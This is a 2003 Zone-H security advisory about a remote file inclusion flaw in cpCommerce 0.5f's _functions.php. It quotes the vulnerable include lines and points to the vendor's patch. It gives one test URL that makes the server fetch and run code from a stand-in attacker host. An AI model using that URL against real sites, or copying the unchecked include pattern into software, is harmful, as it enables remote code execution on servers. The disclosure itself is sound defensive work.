cpCommerce v0.5f and below contains an input validation error in _functions.php which allows remote arbitrary code execution. Exploit URL included. Fix available here.
82a27c83f94222dae3692667195106e99a8da26568c8204f9da7e758dc5513ad
ZH2003-31SA (security advisory): file inclusion vulnerability in cpCommerce
Published: 19 October 2003
Name: cpCommerce Affected Versions: 0.05f (and other versions?)
Vendor: https://www.cpcommerce.org
Issue: file inclusion vulnerability
Author: Astharot (at Zone-H.org)
Description
**********
Zone-H Security Team has discovered a flaw in cpCommerce. cpCommerce "is an
open-source e-commerce solution that is entirely template and module based.".
Details
**********
There's a file inclusion vulnerability in the _functions.php file, line 13-14:
require_once("{$prefix}_config.php");
require_once("{$prefix}_gateways.php");
Is it possible for a remote attacker to include an external file and execute
arbitrary commands with the privileges of the webserver (nobody by default).
To test the vulnerability try this:
https://www.vulnsite.com/path_of_cpcommerce/_functions.php?prefix=https://www.attacker.com/index
In this way the file "https://www.attacker.com/index_config.php" or
"https://www.attacker.com/index_gateways.php" will be included and executed on
the server.
Solution
**********
The author has been contacted and he published a temporary fix in the cpCommerce
website forum, waiting for the new version.
The patch is avaible here:
https://cpcommerce.org/forums/index.php?board=2;action=display;threadid=864.
Suggestions
**********
Fix the script with the patch proposed by the author.
Link to ariginal article here:
https://www.zone-h.org/en/advisories/read/id=3284/
Astharot - Zone-H Admin
--
https://www.zone-h.org - astharot@zone-h.org
PGP Key: https://www.gife.org/astharot.asc
Linux User #292132